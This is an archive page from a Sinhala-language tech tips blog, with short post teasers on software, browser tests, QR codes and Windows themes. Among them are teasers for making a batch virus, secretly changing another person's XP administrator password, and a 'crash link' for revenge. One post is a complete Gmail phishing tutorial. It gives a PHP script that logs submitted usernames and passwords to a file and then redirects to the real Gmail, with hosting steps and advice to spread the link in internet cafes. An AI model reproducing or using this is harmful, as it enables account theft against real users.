ජනප්‍රිය පෝස්ටු

Archive for 2014

ඔබේ වෙබ් බ්‍රවුසරයේ කාර්යක්ෂමතාව මැන ගන්න

Vishwajith Weerasinghe විසින් පළ කරන ලදී
 

How are you my fans......ඔන්න ඉතිං මං අද ඔයාලගෙ වෙබ් බ්‍රවුසරයෙ කාර්යක්ෂමතාවය මැන ගන්න විදිහක් කියල දෙන්න යි යන්නෙ.මෙක Microsoft අායතනයෙන් අපිට දෙන සෙවාවක්.
ප්‍රවර්ගය : ,

ෆෝල්ඩර්ස් හෝලි උත්සවයට අරන් යමු!

Vishwajith Weerasinghe විසින් පළ කරන ලදී

 


 ආයුබෝවන් හැමෝටම! දැන් ඉතිං අපෙ කස්ටිය වෙසක් ජයටම සමරන්න ඇතිනෙ.දෙතුන් දෙනෙක් ට බඩෙ අමාරුවක් නම් අනිවා හැදෙන්න ඇති.ඒකෙන් දැන් වැඩක් නෑ මාත් ඔහේ කියවනවා.හරි.අද මං කියල දෙන්නෙ ටිකක් අමුතු වැඩක් ගැනයි.මං ඉතිං හැමදාම දෙන්නෙ අමුතු වැඩනෙ.
ප්‍රවර්ගය : ,

මදුරු කරදරයට තිත!Anti Mosquito

Vishwajith Weerasinghe විසින් පළ කරන ලදී

ආයුබෝවන්! අද මං ටිකක් වෙනස් විදිහට මගෙ පෝස්ට් එක පටන් ගන්න හිතුවා.කොහොම කොහොමහරි වෙසක් පෝය දවසත් ආවා.ඉතිං කොහොමහරි අපිත් ටිකක් වෙනස් වෙන්නත් එපායැ.ගම්වල උදවිය සිදාදිය පැත්තෙ එහෙම රවුමක් ගහන්න යන්නත් ලක ලැහැස්ති වෙනවා ඇති.ඉතිං මාත් කැලණිය පැත්තෙ වට වන්දනාවෙ යන්න තමයි හිතං ඉන්නෙ.ඊට ඉස්සරවෙල ඔයාලට දීල යන්න දෙයක් මට හම්බුණා.

ප්‍රවර්ගය : ,

ඔබෙ පරිගණකයෙ අනිවාර්යෙන් ම තිබිය යුතු ම සුපිරි මෘදුකාංග 48 සමගින් Free Studio!

Vishwajith Weerasinghe විසින් පළ කරන ලදී

 අපෙ කස්ටියට තවත් අළුත් ගැජට් එකක් ගැන අද මං ඔයාලට කියල දෙනවා.ඇත්තටම කිව්වොත් මෙක නැති කොම් එකකින් නම් කිසිම වැඩක් නෑ.

ප්‍රවර්ගය : ,

ඔබෙ පරිගණකයත් ටික ටික හිර වෙනවද?විසදුම අපෙන්

Vishwajith Weerasinghe විසින් පළ කරන ලදී
 
 කොහොමද අපෙ කස්ටියට.දැන් කාලෙ හැමෝටම වැදගත් වන විදිහෙ ගැජට් එකක් ගෙනවා.මං මෙ දෙන සොෆ්ට්වෙයාර් කෑල්ල ගොඩක් ප්‍රයෝජනවත් එකක්.ඒත් අවාසනාවකට මෙකෙ අළුත් සංස්කරණවල trial period එකක් තියෙනවා.ආ අමතක වුණානෙ මෙ භාණ්ඩෙ නම කියන්න.මෙක Iobit Advanced Windows Care v2Personal .මෙකෙන් අපෙ කම්පියුටර් එක සුපිරියට සුද්ද කරගන්න පුළුවන්.
ප්‍රවර්ගය : ,

Google බුකියෙ වල පල්ලට ම ගිහින් හොයමු

Vishwajith Weerasinghe විසින් පළ කරන ලදී

අෆ්පා අද තමයි ටිකක් විතර free time එකක් ලැබුණෙ.මෙ දවස් ටිකෙම වෙඩිං.හරිම කරදරෙ.ඒකෙන් දැන් කාරි නෑ.ඔන්න ඉතිං මං කොහොම හරි බ්ලොගිය පැත්තට පැන ගත්ත.මං ළගදි දවසක ගූගල් පාරක් දාන කොට (සිංහලෙන්) දැක්කා 'ගැඹුරින් සෙවීම' කියල ඔප්ෂන් ඒකක්. 
ප්‍රවර්ගය : ,

C_relwarC708 v1.0 Virus ඒක හදන හැටි

Vishwajith Weerasinghe විසින් පළ කරන ලදී

ඔන්න ඉතිං අදත් මං වෙනස් ම විදිහෙ වැඩක් ගෙනාවා.අද වැඩෙට නම් ඔයාල කැමති වෙවි.ඒ තමයි වෘත්තීය මට්ටමෙ virus ඒකක් හදන විදිහ.මෙක batch programming වලින් හදපු ඒකක්.


ප්‍රවර්ගය : ,

මුල්ම වෙබ් අඩවිය බලන්න ඒන්න..

Vishwajith Weerasinghe විසින් පළ කරන ලදී

 

මෙ තමයි අපි මෙ දැන් භාවිතා කරන තාක්ෂණයෙ පියා Tim Berners-Lee (Director of the World Wide Web Consortium (W3C) w3.org).මං දැන් මෙයා ගැන කියන්න නෙමෙයි හදන්නෙ.ඔහුගෙ පළමු වෙබ් පිටුව ඒ කියන්නෙ ලොකෙන් ම මුල්ම වෙබ් පිටු ව ඔයාලට පෙන්නන්නයි.ඒ කාලෙ මං හිතන විදිහට අවු 20කට කලින් හදපු වෙබ් පිටුව නැවත වතාවක් අන්තර්ජාලයට දාලා.ඒ වැඩෙ කරල තියෙන්නෙ cern ආයතනයයි.


මතක තියා ගන්න.http://info.cern.ch/ කියන්නෙ පළමු වෙබ් අඩවියයි.
මෙ වගෙ අැති.ඒතනින් පළමු ඒක උඩ ක්ලික් කරන්න.

 මෙ තියෙන්නෙ ඒක


ඔයාලට තවත් දෙවල් ගැන දැන ගන්න යන්න මෙතනින්.

ඒහෙනම් මං යනවා....
ප්‍රවර්ගය : ,

ඔබෙ වෙබ් බ්‍රවුසරයෙ කාර්යක්ෂමතාවය මැන ගන්න

Vishwajith Weerasinghe විසින් පළ කරන ලදී
 

How are you my fans......ඔන්න ඉතිං මං අද ඔයාලගෙ වෙබ් බ්‍රවුසරයෙ කාර්යක්ෂමතාවය මැන ගන්න විදිහක් කියල දෙන්න යි යන්නෙ.මෙක microsoft අායතනයෙන් අපිට දෙන සෙවාවක්.
ප්‍රවර්ගය : ,

ඔබෙ ම QR CODE ඒකක් හදමු

Vishwajith Weerasinghe විසින් පළ කරන ලදී
 

ඔන්න ඉතිං අද මං ඔයාලට QR Code ඔන්ලයින් හදා ගන්න පුළුවන් සයිට් ඒකක් ගැන කියල දෙනවා.කිසිම අය කිරීමක් නැතුව මෙ වැඩෙ කරගන්න පුළුවන්. 

ප්‍රවර්ගය : ,

නැති වෙච්ච DLL ෆයිල්ස් නැවත ගන්න හැටි!

Vishwajith Weerasinghe විසින් පළ කරන ලදී
අපෙ pc ඒකෙ හිටපු ගමන් මෙ වගෙ error messages ඒනවා නෙද?ඒහෙම වෙන්නෙ ගොඩක් වෙලාවට virus නිසයි.තවත් හෙතු තියෙනවා.

ප්‍රවර්ගය : ,

විකොන්තැට්කෙ සමාජ වෙබ් අඩවිය දැන් අපිටත්

Vishwajith Weerasinghe විසින් පළ කරන ලදී

ඔන්න ඉතිං අළුත් අවුරැද්දත් ඉවර වුණා...අපෙ අය අවුරැදු ජයටම සමරන්න අැති නෙ.සමරපු අයටයි නැති අයටයි ඔක්කොටම සුභම සුභ අළුත් අවුරැද්දක් වෙවා
ඉතිං අද මං අාවෙ අළුත් social network ඒකක් ගැන කියන්න.මෙක අපෙ රටෙ ඒකක් නෙවෙ.රැසියාවෙ ඒකක්.නම විකොන්තැට්කෙ.කෙටියෙන් කියනවනම් vk.com.

ප්‍රවර්ගය : ,

Games හදන්න Kodu Games Lab

Vishwajith Weerasinghe විසින් පළ කරන ලදී

අද මං ඔයාලට කියල දෙන වැඩෙට ගොඩක් අය කැමති වෙවි.මං කියල දෙන්නෙ තමන්ටම කියල අළුතින් games හදා ගන්න ක්‍රමයක් ගැනයි.Microsoft අායතනය මෙකට අළුත් software ඒකක් හදල තියෙනවා.ඒකෙ නම තමයි KODU GAMES LAB .

ප්‍රවර්ගය : ,

Administrator Password ඒක අයිතිකාරයට හොරෙන් වෙනස් කරන හැටි!

Vishwajith Weerasinghe විසින් පළ කරන ලදී


අයි අයියො මෙන්න වහිනවා.හි හීතලයි.පට්ට කම්මැලි.ඒ හිංද බ්ලොගිය පැත්තෙ අවා අළුත් හැකිං වැඩක් කියල දෙන්න.
මෙ වැඩෙ ටක් ඒකටම වැඩ කරන්නෙ xp වලට විතරයි.මං දැන් කියන්න හදන්නෙ අපි වෙන කාගෙ හරි administrator account ඒකකට log වෙලා ඉන්න කොට හිමින් සැරෙ administrator password ඒක වෙනස් කර ගන්න විදිහ.
ප්‍රවර්ගය : ,

New Media Player Classic Mode! Get It Here Free

Vishwajith Weerasinghe විසින් පළ කරන ලදී

hi my dr frnds.........හරිම රස්නෙයි අප්ප .රස්නෙ නැති වෙන්නත් ඒක්ක අද මං ඔයාලට දෙන්නෙ අළුත් වැඩක්. දැන් කාලෙ‍ media players වැහි වැහැල නෙ.KMPlayer,VLC media Player,GOMPlayer වගෙ ඒවා ගොඩක් තියෙනවා.ඒත් අපිට windows ඒක්ක ලැබෙන media players ගැන අමතකයි...

ප්‍රවර්ගය : ,

ලොව හොදම web site builder මෘදුකාංගය මෙන්න!

Vishwajith Weerasinghe විසින් පළ කරන ලදී

වෙබ් ඩිසයිනින් කරන අපෙ අයට නියම භාණ්ඩයක් තමයි අද මං දෙන්නෙ.Dreamviewer නෙ ගොඩක් අය USE කරන්නෙ..ඒත් මෙක ඊට වැඩිය පහසුකම් ගොඩක් තියෙන software 1ක්..
ප්‍රවර්ගය : ,

ඔබෙ dialog 3g internet speed ඒක වැඩි කරගන්න!

Vishwajith Weerasinghe විසින් පළ කරන ලදී


අද මං ඔයාලට කියල දෙනව dialog internet speed ඒක වැඩි කරගන්න විදිහ.සමහර අය දන්නවත් අැති.කමක් නෑ හිත හොදින් කියල දෙන ඒකනෙ

ප්‍රවර්ගය : ,

ඔබෙ පරිගණකයටත් අළුත්ම අළුත් booster ක්..

Vishwajith Weerasinghe විසින් පළ කරන ලදී


අද මං ගෙනවා අළුත් ම අළුත් software 1ක්.මෙක ගොඩක් වැදගත් ඒකක්.මම ඒහෙම කිව්වෙ මෙක හරියට බූස්ටරයක් වගෙ.ඒ කියන්නෙ අපෙ මැෂින් ඒක speeeeeeeeed කරල දෙන ගැජට් ඒකක්.
ප්‍රවර්ගය : ,

හොදම claculator ඔබටත් google වෙතින්!

Vishwajith Weerasinghe විසින් පළ කරන ලදී

දැන් මං කියල දෙන්නෙ ගොඩක් අය internet භාවිතා කරන අය නිසා ගණන් හදන්න calculator ඒකක් අර ගන්න විදිහ.මෙක අපිට ලැබෙන්නෙ google ඒකෙන්.ඔක්කොම ගණන් ටික හදා ගන්න ඒකෙන් පුළුවන්..

ප්‍රවර්ගය : ,

Gmail address ඒකක් නැතුව gmail account ඒකක් හදමු!

Vishwajith Weerasinghe විසින් පළ කරන ලදී



මෙක ටිකක් අමුතුයි තමා.ඔයාල හිතයි email address ඒකක් නැතුව account ඒකක් හදන්නෙ කොහොමද කියල.ඒත් ඒ දෙ කරන්න පුළුවන්.GMAIL ඒකෙන් ඒකට full support කරනවා...

ප්‍රවර්ගය : ,

ඔබ දැන ගත යුතුම RUN Commands 120 ක්.

Vishwajith Weerasinghe විසින් පළ කරන ලදී


logo



කොහොමද අපෙ කස්ටියට අැ?ඉතිං මං අද ඔයාට දෙන්නෙ ටිකක් විශෙෂ දෙයක්.ඒ තමයි RUN Commands 120 ක්.heeeeeeeee.

ප්‍රවර්ගය : ,

ඔබෙ පරිගණකයටත් CCleaner කොස්සක්!

Vishwajith Weerasinghe විසින් පළ කරන ලදී




හායි යාළුවනෙ...............අද මං ඔයාලට දෙන්නෙ සුපිරි කොස්සක්.හැබැයි කොස්සක් කිව්වට අතු ගාන්නෙ නම් කොම්පියුටරෙ අැතුලෙ අහු මුලු වල.හොදයි නෙ.

ප්‍රවර්ගය : ,

Find any ip address from your CMD-ip හොයන ලෙසිම ක්‍රමය

Vishwajith Weerasinghe විසින් පළ කරන ලදී

අද මං ඔයාලට ඒච්චර වැදගත් නැති ඒත් සමහර වෙලාවට අවශ්‍ය වෙන දෙයක් ගැන.ඒ තමයි ඔනම සයිට් ඒකක ip address ඒක හොයා ගන්න විදිහ.වැඩෙ ඒච්චර අමාරැ නෑ.අළුත් software කෑලි ඒහෙමත් ඔන නෑ.command promt ඒකෙන්ම මෙක කරන්න පුළුවන්.
ප්‍රවර්ගය : ,

Repair your pc with 1 run command line-XP

Vishwajith Weerasinghe විසින් පළ කරන ලදී





සමහර වෙලාවට අපෙ pc repair කරගන්න වෙනව.ඒ කියන්නෙ වින්ඩොස් අවුල් ගහපුවම(ෆයිල් ඒකක් දෙකක් මිස් වුණාම).ඒකට හොද විසදුමක් අද මං ඔයාලට දෙනවා.ලෙසියි.වැඩිය උඩ පැන පැන දගලන්න දෙයක් නෑ.

ප්‍රවර්ගය : ,

Hacking 02 -Phishing මගින් gmail ඒකක් හැක් කරමු

Vishwajith Weerasinghe විසින් පළ කරන ලදී




අද මං ඔයාලට අළුත් වැඩක් කියල දෙනවා.ඒ තමයි phishing කරන විදිහ ගැන.මෙකට ඔයාටම කියල වෙබ් සයිට් ඒකක් තියෙනවනම් ගොඩක් හොදයි.නැතත් කමක් නෑ.ඔන නම් blog ඒකක් හදාගන්නත් පුළුවන්.ඒහෙම නැත්තං ඔයාගෙ pc ඒකෙන් ම මෙ වැඩෙ කරන්නත් පුළුවන්.

කොෙහාම හරි phishing කියන්නෙ අැත්ත විදිහට තියෙන බොරැ වෙබ් සයිට් ඒකක් මගින් account වල  usernames, passwords වගෙ දෙවල් උස්සන ක්‍රමයයි.

අද මං gmail ඒකකට phishing කරන හැටි කියල දෙනවා.

මුලින්ම ඔයා gmail.com කියන gmail ඒකෙ login වෙන තැනට යන්න.
ඊට පස්සෙ ඒ page ඒක save කරගන්න CTRL+S  or  File -> Save page as යන්න.



save කරගන්න Gmail කියල අළුතෙන් හදා ගත්තු folder ඒකක පහත විදිහට.


save කරගත්තට පස්සෙ ServiceLogin.htm කියන ෆයිල් ඒක  index.htm කියල වෙනස් කරගන්න.(rename)

දැන් ඔයා හදා ගන්න ඔන php script ඒකක්.මොකටද දන්නවද web page ඒකෙ login ක්ලික් කරාම ඒකෙ තියෙන username,password ඒකයි අපිට ලබා ගන්න.

පහත තියෙන කෙත ටික notepad ඒකට දාගෙන phish.php කියල save කර ගන්න.තව list.txt කියල අළුත් හිස් ෆයිල් ඒකකුත් හදා ගෙන ඒතනටම ඒකතු කරගන්න.

<?php // This marks the beginning of the PHP script.
Header(“Location: 
https://www.google.com/accounts/ServiceLogin?service=mail&passive=
true&rm=false&continue=http%3A%2F%2Fmail.google.com%2Fmail%2F
%3Fui%3Dhtml%26zy%3Dl&bsv=1k96igf4806cy&ltmpl=default&ltmplcac
he=2 “); // once you click “Sign in” in the fake website, this redirects 
you to the real Gmail website, making the whole process look more 
legit.
$handle = fopen(“list.txt”, “a”); // this tells the server to open the file 
“list.txt” and get it ready for appending data. Which in this case is your 
username and password.
Foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
} // This section simply assigns all the information going through 
this form to a variable. This includes your username and password.
Fwrite($handle, “\r\n”); // This writes your details to the file “list.txt”
fclose($handle); // This simply closes the connection to the file 
“list.txt”
exit;
?> // Marks the end of the PHP program.


ඔක්කොම save කරාම මෙ විදිහට පෙන්නාවි.

දැන් අපි හදපු script ඒක index.htm කියන ෆයිල් ඒකට සම්බන්ධ කරන්න ඔන.ඒකට index.htm කියන ෆයිල් ඒක  right click > Edit යන විධානයෙන් notepad ඒකෙන් open කර ගන්න.
ඊට පසසෙ  <CTR> + F or go to Edit -> Find , type in action and hit “Find Next” කරන්න.
ඒතකොට action කියන වචනය notepad ඒකෙ නිල් පාටින් පෙන්නාවි.



action= යන කොටසට පසු " " තුළ තියෙන https://www.google.com/..... කියන ෙප්ළියම අයින් කරල phish.php කියල ටයිප් කරන්න.
උදා- action="phish.php"


ඊට පස්සෙ method කියන වචයට පස්සෙ තියෙන post කියන ඒක වෙනුවට get කියල ටයිප් කරන්න.


දැන් හරි.ඊට පස්සෙ http://www.000webhost.com/ වගෙ සයිට් ඒකකින් නොමිලෙ වෙබ් සයිට් ඒකක් හදා ගෙන ඒකට ඉහත සියළුම ෆයිල්ස් upload කරගන්න.සයිට් ඒකෙ නම gmail ඒකෙම නම වුණා නම් මරැ.

"Once all the files are uploaded, you must give writing permissions to the 
“list.txt” file. Every hosting company should have a CHMOD option next 
to each file. Select this option and change the file permission for 
“list.txt” to 777. If you can’t figure out how to do this, ask people that 
use the same host or simply Google something similar to: 
yourwebhostname chmod” "

සමහර අවස්ථා වලදී list.txt කියන ෆයිල් ඒකට අවසර ඉල්ලූ විට 777 යන අගය ලබා දිය යුතුය.
දැන් ඔබෙ වෙබ් අඩවියට ගොස් ඒහි ඔබෙ gmail username & password දීල බලන්න.ඊට පස්සෙ http://www.yourwebhosturl.com/youraccount/list.txt කියන තැනට(yourwebhosturl යනු ඔබෙ වෙබ් අඩවියෙ නමයි.youraccount යනු ඔබෙ account ඒකෙහි නමයි.ඒය ඔබ ලබා දෙන තොරතුරැ අනුව වෙනස් වෙ.උදා-http://www.gmail.000webhost.com/gmailhack/list.txt)
ඒහි ඔබ ලබා දුන් username ඒක හා password ඒක  Email හා Password යටතෙ තියෙවි.

මෙ වැඩෙ සාර්ථක කරගන්න නම් internet cafe දෙක තුනක ජිමෙල් ඒකට යන link ඒක විදිහට ඔයාගෙ සයිට් ඒක දුන්න නම් හරි.

ඒහෙනම් හරි.අප්පෙ මගෙ අත් දෙකත් රිදෙනවා.................................මං ගියා.............



ප්‍රවර්ගය : ,

ඔයාගෙ pc ඒක වෙන කෙනෙක් භාවිතා කරනවනම් ඒයාල කරපු දෙවල් හොයාගන්න හැටි

Vishwajith Weerasinghe විසින් පළ කරන ලදී

අද මං ඔයාලට කියල දෙන්නෙ ඔයාගෙ pc ඒක වෙන කවුරැ හරි පාවිච්චි කරොත් ඒයාල කරපු දෙවල් නැවත අපිට බලාගන්න පූළුවන් ක්‍රමයක් ගැනයි...මෙකට බැච් කියන භාෂාවයි භාවිතා කරන්නෙ. 

ප්‍රවර්ගය : ,

Windows Logon Screen ඒක වෙනස් කරමු!

Vishwajith Weerasinghe විසින් පළ කරන ලදී

අද මං ඔයාලට දෙන්නෙ windows logon screen ඒක වෙනස් කරල වෙන ඒකක් දාගන්න පුළුවන් ගැජට් ඒකක් ගැනයි.පහල රෑපෙ click කරල stardock site ඒකට යන්න.


දැන්  7,vista අය මුල් download button ඒකද xp  අය දෙවැනි download button ඒකද ක්ලික් කරන්න.


දැන් ඔයාගෙ e-mail address ඒක දීල download ක්ලික් කරන්න.ඊට පස්සෙ ඔයාගෙ ඊ-මෙල් ඒකට ගිහිල්ල ඒකට අාපු download link ඒකෙන් බාගන්න.


 මෙයාලගෙ වෙබ් අඩවියෙ අළුත් logon screens ඒහෙමත් තියෙනවා.


ඒහෙනම් ජය වෙවා!

ප්‍රවර්ගය : ,

Windows වලපල්ලට යවමු-crash link!

Vishwajith Weerasinghe විසින් පළ කරන ලදී

හොදයි යාළුවනෙ අද මං ඔයාලට දෙනවා  special link ඒකක්.ඒත් ඒක යොදාගන්න ඔන කවුරැ හරි තරහ කාරයෙක්ව මට්ටු කරන්න.මෙක crash link ඒකක්...

ප්‍රවර්ගය : ,

සුපිරි ම සුපිරි media player ක්.AIMP 3

Vishwajith Weerasinghe විසින් පළ කරන ලදී


ඹන්න යාළුවන්ට අළුත් player ක් හදුන්වා දෙන්න හිතුවා.මෙකෙ graphic ඒහෙමත් පට්ට.අනිත් ඒක මෙක free software ඒකක්.බලන්න හොදද කියල
ප්‍රවර්ගය : ,

පට්ටම පට්ට Royale Theme for XP!

Vishwajith Weerasinghe විසින් පළ කරන ලදී

මට හුග කාලෙකින් මේ පැත්තෙ එන්න බැරි වුණා.මට ලගදි දවසක ලස්සන තීම් එකක් හම්බුණා..පට්ට..ඉතිං මං හිතුවා ඔයාලටත් එක දෙන්න..උඩ තියෙන්නෙ ඒකෙ screenshot එකක්.හොදයි නෙ??????


මේක zip එකක් නිසා extract කරගන්න.ඒකෙ setup file එකත් right click කරල winrar එකෙන් extract here කියන විධානය දෙන්න. එතකොට Resources කියල folder එකක් ඇති.ඒකෙ Theme කියන folder ට ගිහිල්ල ඒකෙ ඇතුළෙ තියෙන file 02 copy කරගෙන C:\WINDOWS\Resources\Themes කියන තැනට ගිහිල්ල paste කරන්න.
දැන් desktop එකේදි  right click > properties > Appearance වෙත ගිහිල්ල Windows and buttons යටතේ ඇති Royale Theme select කරල ok click කරන්න.


බලන්න ලස්සන.....

ප්‍රවර්ගය : ,

විෂුවල් බේසික් සිංහලෙන් ඉගෙන ගන්න කැමතිද? PDF GUIDE

Vishwajith Weerasinghe විසින් පළ කරන ලදී
ගොඩක් අය කැමතිනේ progrmming ගැන ඉගෙන ගන්න.ඒත් ලංකාවෙ ඒ ගැන දන්න අය ගොඩක් අඩුයිනෙ.මේනිසා මම හිතුවා programming කරන හැටි කියල දෙන්න.ඒත් මං කියල දෙනවා කිව්වට e-book 02 ක් ‍දෙන්න තමයි යන්නෙ.ගොඩක් අයට ලේසියෙන්ම ඉගෙන ගන්න පුළුවන් visual basic 6.0 නෙ.ඒ හිංද මං ඔයාලට දෙන්නෙ විෂුවල් බේසික් සිංහලෙන් ඉගෙන ගන්න පුළුවන් වෙන විදිහට සිංහල විෂුවල් බේසික් ඊ-බුක් 02ක්.පහළ තියෙන ලිංකුවෙන් ගිහිල්ල බා ගන්න.විෂුවල් බේසික් ගැන මමත් ටිකක් දන්නවා.ඔයාලට මොකක් හරි විෂුවල් බේසික් වල ගැටළුවක් ආවොත් මට කියන්න....I help u..




ඔබගේ වටිනා අදහස් හා යෝජනා කමෙන්ට් කරන්න.එය මෙම අඩවියේ දියුණූවට හේතු වනු ඇත.!
ප්‍රවර්ගය : ,

ගෙදරදීම mic එකක් ඔබේ computer ටත් හදාගන්න!

Vishwajith Weerasinghe විසින් පළ කරන ලදී
හරි අද මං හිතුවා තාක්ෂණික ලිපියක් ලියන්න...ඔයාගෙ computer ටත් mic එකක් හදා ගන්න හැටි කියල දෙන්න ඕන කියල හිතුවා..සාමාන්‍ය හෙඩ්ෆෝන් එකක් රැ700 විතර වෙනවනේ..
ප්‍රවර්ගය : ,

3D කණ්ණාඩියක් හදමු

Vishwajith Weerasinghe විසින් පළ කරන ලදී

යාළුවනේ ඔන්න අද මං tech වැඩක් කියලදෙන්නයි යන්නෙ.3D Glass එකක් හදන හැටි....වැඩේ එච්චර අමාරැ නෑ.
මං ඉතිං කම්මැලියනේ.ඒ හිංද photos ටික wikihow කියන සයිට් එකෙන් ගත්ත.
ඔයාලට ප්‍රින්ටරයක් තියෙනවනම් එල.නැතත් අවුලක් නෑ.කඩේකට දීල ප්‍රින්ට් අවුට් එකක් ගත හැකි.‍පහළ ලිංකුවෙන් ගිහිල්ල කණ්ණාඩියේ ආකෘතිය බා ගන්න.
ඒක A4 එකක print කරගන්න. ඊට පස්සෙ box board එකක අලවගන්න.


ඊට පස්සෙ ඒක කපා ගන්න ඕනි.ලස්සනට කපා ගත්ත නම් පහළ රෑපෙ වගෙ තියේවි.


හරි.දැන් lens දෙක හදා ගන්න ඕනි.පර්මනන්ට් මාකර් පෙන් 02 ක් හොයාගන්න ඕන රතු පාටිනුත් නිල් පාටිනුත්.ඊට පස්සෙ කණ්ණාඩියේ ඇස් 02 ට සෙට් වෙන විදිහට කපාගත්තු ඉටි කොළ 02ක් පහත රෑපය පරිදි කපා ගෙන පාට කරගන්න.





දැන් ඒ කපා ගත්ත කෑලි 02 කණ්ණාඩියේ ඇස් 02ට අලවගන්න ඕන.(රතු පාට එක ඔබේ වම් ඇහැටත් නිල් පාට එක ඔබේ දකුණු ඇහැටත් එන විදිහට)


දැන් ඉස්සෙල්ල කපා ගත්ත කණ්ණාඩියේ දෙපැත්තෙ කෑලි 02 ගානට අලවගන්න.


දැන් දාල බලන්න 3D විදිහට පේනවද කියල.



film 3d විදිහට බලන්න ඕන නම්  3d පහසුකම ඇති player ක් ඕන. KMPlayer ඒකට යොදා ගත හැකියි.
KMPlayer නැත්තං මෙන්න බා ගන්න.

ප්‍රවර්ගය : ,

- Copyright © VimasumSoft - Date A Live - Powered by Blogger - Designed by Johanes Djogan -